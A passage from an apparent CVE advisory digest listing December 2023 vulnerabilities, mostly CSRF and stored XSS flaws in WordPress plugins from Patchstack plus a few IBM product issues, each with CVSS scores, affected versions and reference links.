Cross-Site Request Forgery (CSRF) vulnerability in BinaryCarpenter Menu Bar Cart Icon For WooCommerce By Binary Carpenter. This issue affects Menu Bar Cart Icon For WooCommerce By Binary Carpenter: from n/a through 1.49.3.

CVE ID : CVE-2023-49855
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/bc-menu-cart-woo/wordpress-bc-menu-bar-cart-icon-for-woocommerce-by-binary-carpenter-plugin-1-49-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48762

First published on : 18-12-2023 17:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Crocoblock JetElements For Elementor. This issue affects JetElements For Elementor: from n/a through 2.6.13.

CVE ID : CVE-2023-48762
Source : audit@patchstack.com
CVSS Score : 6.3

References :
https://patchstack.com/database/vulnerability/jet-elements/wordpress-jetelements-for-elementor-plugin-2-6-13-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49165

First published on : 15-12-2023 14:15:15
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Real Big Plugins Client Dash allows Stored XSS. This issue affects Client Dash: from n/a through 2.2.1.

CVE ID : CVE-2023-49165
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/client-dash/wordpress-client-dash-plugin-2-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49174

First published on : 15-12-2023 15:15:08
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS. This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5.

CVE ID : CVE-2023-49174
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/responsive-lightbox/wordpress-responsive-lightbox-plugin-2-4-5-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49175

First published on : 15-12-2023 15:15:08
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kreativo Pro KP Fastest Tawk.To Chat allows Stored XSS. This issue affects KP Fastest Tawk.To Chat: from n/a through 1.1.1.

CVE ID : CVE-2023-49175
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/kp-fastest-tawk-to-chat/wordpress-kp-fastest-tawk-to-chat-plugin-1-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49180

First published on : 15-12-2023 15:15:09
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ternstyle LLC Automatic Youtube Video Posts Plugin allows Stored XSS. This issue affects Automatic Youtube Video Posts Plugin: from n/a through 5.2.2.

CVE ID : CVE-2023-49180
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/automatic-youtube-video-posts/wordpress-automatic-youtube-video-posts-plugin-plugin-5-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49181

First published on : 15-12-2023 15:15:09
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Event Manager WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce allows Stored XSS. This issue affects WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce: from n/a through 3.1.40.

CVE ID : CVE-2023-49181
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/wp-event-manager/wordpress-wp-event-manager-plugin-3-1-39-cross-site-scripting-xss-vulnerability-2?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49184

First published on : 15-12-2023 15:15:10
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPDeveloper Parallax Slider Block allows Stored XSS. This issue affects Parallax Slider Block: from n/a through 1.2.4.

CVE ID : CVE-2023-49184
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/parallax-slider-block/wordpress-parallax-slider-block-plugin-1-2-4-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49188

First published on : 15-12-2023 15:15:10
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZealousWeb Track Geolocation Of Users Using Contact Form 7 allows Stored XSS. This issue affects Track Geolocation Of Users Using Contact Form 7: from n/a through 1.4.

CVE ID : CVE-2023-49188
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/track-geolocation-of-users-using-contact-form-7/wordpress-track-geolocation-of-users-using-contact-form-7-plugin-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49189

First published on : 15-12-2023 16:15:43
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Getsocial, S.A. Social Share Buttons & Analytics Plugin – GetSocial.Io allows Stored XSS. This issue affects Social Share Buttons & Analytics Plugin – GetSocial.Io: from n/a through 4.3.12.

CVE ID : CVE-2023-49189
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/wp-share-buttons-analytics-by-getsocial/wordpress-social-share-buttons-analytics-plugin-getsocial-io-plugin-4-3-12-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49190

First published on : 15-12-2023 16:15:44
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS. This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6.

CVE ID : CVE-2023-49190
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/site-offline/wordpress-site-offline-or-coming-soon-or-maintenance-mode-plugin-1-5-6-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49191

First published on : 15-12-2023 16:15:44
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Supsystic GDPR Cookie Consent by Supsystic allows Stored XSS. This issue affects GDPR Cookie Consent by Supsystic: from n/a through 2.1.2.

CVE ID : CVE-2023-49191
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/gdpr-compliance-by-supsystic/wordpress-gdpr-cookie-consent-by-supsystic-plugin-2-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49747

First published on : 15-12-2023 16:15:44
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebFactory Ltd Guest Author allows Stored XSS. This issue affects Guest Author: from n/a through 2.3.

CVE ID : CVE-2023-49747
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/guest-author/wordpress-guest-author-plugin-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49767

First published on : 15-12-2023 16:15:45
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Stored XSS. This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24.

CVE ID : CVE-2023-49767
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/biteship/wordpress-biteship-plugin-2-2-22-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49829

First published on : 15-12-2023 16:15:45
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeum Tutor LMS – eLearning and online course solution allows Stored XSS. This issue affects Tutor LMS – eLearning and online course solution: from n/a through 2.2.4.

CVE ID : CVE-2023-49829
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/tutor/wordpress-tutor-lms-plugin-2-2-4-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2022-40312

First published on : 18-12-2023 15:15:08
Last modified on : 18-12-2023 17:24:19

Description :
Server-Side Request Forgery (SSRF) vulnerability in GiveWP GiveWP – Donation Plugin and Fundraising Platform. This issue affects GiveWP – Donation Plugin and Fundraising Platform: from n/a through 2.25.1.

CVE ID : CVE-2022-40312
Source : audit@patchstack.com
CVSS Score : 5.5

References :
https://patchstack.com/database/vulnerability/give/wordpress-givewp-plugin-2-25-1-server-side-request-forgery-ssrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-49744

First published on : 15-12-2023 16:15:44
Last modified on : 15-12-2023 16:53:06

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce. This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through 2.21.3.

CVE ID : CVE-2023-49744
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/gift-up/wordpress-gift-up-gift-cards-for-wordpress-and-woocommerce-plugin-2-21-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49824

First published on : 17-12-2023 11:15:07
Last modified on : 18-12-2023 14:05:22

Description :
Cross-Site Request Forgery (CSRF) vulnerability in PixelYourSite Product Catalog Feed by PixelYourSite. This issue affects Product Catalog Feed by PixelYourSite: from n/a through 2.1.1.

CVE ID : CVE-2023-49824
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/product-catalog-feed/wordpress-product-catalog-feed-by-pixelyoursite-plugin-2-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49834

First published on : 17-12-2023 11:15:08
Last modified on : 18-12-2023 14:05:22

Description :
Cross-Site Request Forgery (CSRF) vulnerability in realmag777 FOX – Currency Switcher Professional for WooCommerce. This issue affects FOX – Currency Switcher Professional for WooCommerce: from n/a through 1.4.1.4.

CVE ID : CVE-2023-49834
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/woocommerce-currency-switcher/wordpress-fox-currency-switcher-professional-for-woocommerce-plugin-1-4-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49854

First published on : 18-12-2023 11:15:13
Last modified on : 18-12-2023 14:05:17

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Tribe Interactive Caddy – Smart Side Cart for WooCommerce. This issue affects Caddy – Smart Side Cart for WooCommerce: from n/a through 1.9.7.

CVE ID : CVE-2023-49854
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/caddy/wordpress-caddy-plugin-1-9-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49843

First published on : 18-12-2023 15:15:09
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in QuanticEdge First Order Discount Woocommerce. This issue affects First Order Discount Woocommerce: from n/a through 1.21.

CVE ID : CVE-2023-49843
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/first-order-discount-woocommerce/wordpress-first-order-discount-woocommerce-plugin-1-21-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49853

First published on : 18-12-2023 15:15:09
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in PayTR Ödeme ve Elektronik Para Kuruluşu A.Ş. PayTR Taksit Tablosu – WooCommerce. This issue affects PayTR Taksit Tablosu – WooCommerce: from n/a through 1.3.1.

CVE ID : CVE-2023-49853
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/paytr-taksit-tablosu-woocommerce/wordpress-paytr-taksit-tablosu-woocommerce-plugin-1-3-1-broken-authentication-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-33214

First published on : 18-12-2023 16:15:09
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Tagbox Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics. This issue affects Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics: from n/a through 3.1.

CVE ID : CVE-2023-33214
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/taggbox-widget/wordpress-taggbox-ugc-galleries-social-media-widgets-user-reviews-analytics-plugin-2-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-47806

First published on : 18-12-2023 16:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Saint Systems Disable User Login. This issue affects Disable User Login: from n/a through 1.3.7.

CVE ID : CVE-2023-47806
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/disable-user-login/wordpress-disable-user-login-plugin-1-3-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-46617

First published on : 18-12-2023 17:15:09
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in AdFoxly AdFoxly – Ad Manager, AdSense Ads & Ads.Txt. This issue affects AdFoxly – Ad Manager, AdSense Ads & Ads.Txt: from n/a through 1.8.5.

CVE ID : CVE-2023-46617
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/adfoxly/wordpress-adfoxly-ad-manager-adsense-ads-ads-txt-plugin-1-8-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48772

First published on : 18-12-2023 22:15:09
Last modified on : 18-12-2023 22:15:09

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Arul Prasad J Prevent Landscape Rotation. This issue affects Prevent Landscape Rotation: from n/a through 2.0.

CVE ID : CVE-2023-48772
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/prevent-landscape-rotation/wordpress-prevent-landscape-rotation-plugin-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48773

First published on : 18-12-2023 22:15:09
Last modified on : 18-12-2023 22:15:09

Description :
Cross-Site Request Forgery (CSRF) vulnerability in WP Doctor WooCommerce Login Redirect. This issue affects WooCommerce Login Redirect: from n/a through 2.2.4.

CVE ID : CVE-2023-48773
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/woo-login-redirect/wordpress-woo-login-redirect-plugin-2-2-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48778

First published on : 18-12-2023 22:15:09
Last modified on : 18-12-2023 22:15:09

Description :
Cross-Site Request Forgery (CSRF) vulnerability in VillaTheme Product Size Chart For WooCommerce. This issue affects Product Size Chart For WooCommerce: from n/a through 1.1.5.

CVE ID : CVE-2023-48778
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/product-size-chart-for-woo/wordpress-product-size-chart-for-woocommerce-plugin-1-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49148

First published on : 18-12-2023 22:15:10
Last modified on : 18-12-2023 22:15:10

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Kulwant Nagi Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates. This issue affects Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates: from n/a through 3.0.5.

CVE ID : CVE-2023-49148
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/affiliatebooster-blocks/wordpress-affiliate-booster-plugin-3-0-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49197

First published on : 15-12-2023 16:15:44
Last modified on : 15-12-2023 16:53:06

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Apasionados, Apasionados del Marketing, NetConsulting DoFollow Case by Case. This issue affects DoFollow Case by Case: from n/a through 3.4.2.

CVE ID : CVE-2023-49197
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/dofollow-case-by-case/wordpress-dofollow-case-by-case-plugin-3-4-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49749

First published on : 15-12-2023 16:15:45
Last modified on : 15-12-2023 16:53:06

Description :
Cross-Site Request Forgery (CSRF) vulnerability in SureTriggers SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!. This issue affects SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!: from n/a through 1.0.23.

CVE ID : CVE-2023-49749
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/suretriggers/wordpress-suretriggers-plugin-1-0-23-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-24380

First published on : 17-12-2023 10:15:07
Last modified on : 18-12-2023 14:05:28

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Webbjocke Simple Wp Sitemap. This issue affects Simple Wp Sitemap: from n/a through 1.2.1.

CVE ID : CVE-2023-24380
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/simple-wp-sitemap/wordpress-simple-wp-sitemap-plugin-1-2-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49751

First published on : 17-12-2023 10:15:07
Last modified on : 18-12-2023 14:05:22

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Ciprian Popescu Block for Font Awesome. This issue affects Block for Font Awesome: from n/a through 1.4.0.

CVE ID : CVE-2023-49751
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/block-for-font-awesome/wordpress-block-for-font-awesome-plugin-1-3-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49769

First published on : 17-12-2023 10:15:07
Last modified on : 18-12-2023 14:05:22

Description :
Cross-Site Request Forgery (CSRF) vulnerability in SoftLab Integrate Google Drive. This issue affects Integrate Google Drive: from n/a through 1.3.4.

CVE ID : CVE-2023-49769
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/integrate-google-drive/wordpress-integrate-google-drive-plugin-1-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49775

First published on : 17-12-2023 10:15:08
Last modified on : 18-12-2023 14:05:22

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Denis Kobozev CSV Importer. This issue affects CSV Importer: from n/a through 0.3.8.

CVE ID : CVE-2023-49775
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/csv-importer/wordpress-csv-importer-plugin-0-3-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49816

First published on : 17-12-2023 11:15:07
Last modified on : 18-12-2023 14:05:22

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Innovative Solutions Fix My Feed RSS Repair. This issue affects Fix My Feed RSS Repair: from n/a through 1.4.

CVE ID : CVE-2023-49816
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/fix-my-feed-rss-repair/wordpress-fix-my-feed-rss-repair-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-50372

First published on : 18-12-2023 11:15:14
Last modified on : 18-12-2023 14:05:17

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Hiroaki Miyashita Custom Post Type Page Template. This issue affects Custom Post Type Page Template: from n/a through 1.1.

CVE ID : CVE-2023-50372
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/custom-post-type-page-template/wordpress-custom-post-type-page-template-plugin-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49840

First published on : 18-12-2023 15:15:09
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Palscode Multi Currency For WooCommerce. This issue affects Multi Currency For WooCommerce: from n/a through 1.5.5.

CVE ID : CVE-2023-49840
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/wc-multi-currency/wordpress-multi-currency-for-woocommerce-plugin-1-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-49844

First published on : 18-12-2023 15:15:09
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Kevin Ohashi WPPerformanceTester. This issue affects WPPerformanceTester: from n/a through 2.0.0.

CVE ID : CVE-2023-49844
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/wpperformancetester/wordpress-wpperformancetester-plugin-2-0-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-47787

First published on : 18-12-2023 16:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 2.0.3.

CVE ID : CVE-2023-47787
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/woocommerce-bookings/wordpress-woocommerce-bookings-plugin-2-0-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-47789

First published on : 18-12-2023 16:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce Canada Post Shipping Method. This issue affects Canada Post Shipping Method: from n/a through 2.8.3.

CVE ID : CVE-2023-47789
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/woocommerce-shipping-canada-post/wordpress-woocommerce-canada-post-shipping-plugin-2-8-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48755

First published on : 18-12-2023 16:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.4.

CVE ID : CVE-2023-48755
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/teachpress/wordpress-teachpress-plugin-9-0-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48766

First published on : 18-12-2023 17:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-Site Request Forgery (CSRF) vulnerability in SVGator SVGator – Add Animated SVG Easily. This issue affects SVGator – Add Animated SVG Easily: from n/a through 1.2.4.

CVE ID : CVE-2023-48766
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/svgator/wordpress-svgator-add-animated-svg-easily-plugin-1-2-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48768

First published on : 18-12-2023 22:15:09
Last modified on : 18-12-2023 22:15:09

Description :
Cross-Site Request Forgery (CSRF) vulnerability in CodeAstrology Team Quantity Plus Minus Button for WooCommerce by CodeAstrology. This issue affects Quantity Plus Minus Button for WooCommerce by CodeAstrology: from n/a through 1.1.9.

CVE ID : CVE-2023-48768
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/wc-quantity-plus-minus-button/wordpress-quantity-plus-minus-button-for-woocommerce-by-codeastrology-plugin-1-1-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48769

First published on : 18-12-2023 22:15:09
Last modified on : 18-12-2023 22:15:09

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Blue Coral Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back. This issue affects Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back: from n/a through 2.3.

CVE ID : CVE-2023-48769
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/chat-bubble/wordpress-chat-bubble-plugin-2-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-48781

First published on : 18-12-2023 22:15:10
Last modified on : 18-12-2023 22:15:10

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Marketing Rapel MkRapel Regiones y Ciudades de Chile para WC. This issue affects MkRapel Regiones y Ciudades de Chile para WC: from n/a through 4.3.0.

CVE ID : CVE-2023-48781
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/wc-ciudades-y-regiones-de-chile/wordpress-mkrapel-regiones-y-ciudades-de-chile-para-wc-plugin-4-3-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Source : us.ibm.com

Vulnerability ID : CVE-2023-46177

First published on : 18-12-2023 15:15:08
Last modified on : 18-12-2023 17:24:19

Description :
IBM MQ Appliance 9.3 LTS and 9.3 CD could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request to view arbitrary files on the system. IBM X-Force ID: 269536.

CVE ID : CVE-2023-46177
Source : psirt@us.ibm.com
CVSS Score : 6.5

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/269536 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091235 | source : psirt@us.ibm.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-47741

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
IBM i 7.3, 7.4, 7.5, IBM i Db2 Mirror for i 7.4 and 7.5 web browser clients may leave clear-text passwords in browser memory that can be viewed using common browser tools before the memory is garbage collected. A malicious actor with access to the victim's PC could exploit this vulnerability to gain access to the IBM i operating system. IBM X-Force ID: 272532.

CVE ID : CVE-2023-47741
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://www.ibm.com/support/pages/node/7097785 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7097801 | source : psirt@us.ibm.com


Vulnerability ID : CVE-2023-40691

First published on : 18-12-2023 21:15:08
Last modified on : 18-12-2023 21:15:08

Description :
IBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 may reveal sensitive information contained in application configuration to developer and administrator users. IBM X-Force ID: 264805.

CVE ID : CVE-2023-40691
Source : psirt@us.ibm.com
CVSS Score : 4.9

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/264805 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7096365 | source : psirt@us.ibm.com

Vulnerability : CWE-200


Source : vuldb.com

